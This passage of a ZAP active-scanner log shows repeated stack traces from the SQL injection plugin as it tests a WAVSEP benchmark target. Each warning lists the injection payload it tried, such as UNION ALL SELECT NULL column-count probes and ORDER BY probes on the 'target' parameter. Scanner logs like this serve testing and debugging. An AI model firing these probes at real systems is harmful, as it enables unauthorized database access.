org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682565 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682566 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682567 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682568 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682568 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682569 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682570 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682571 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682572 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682573 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682573 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682574 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1797#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1797# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682575 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION 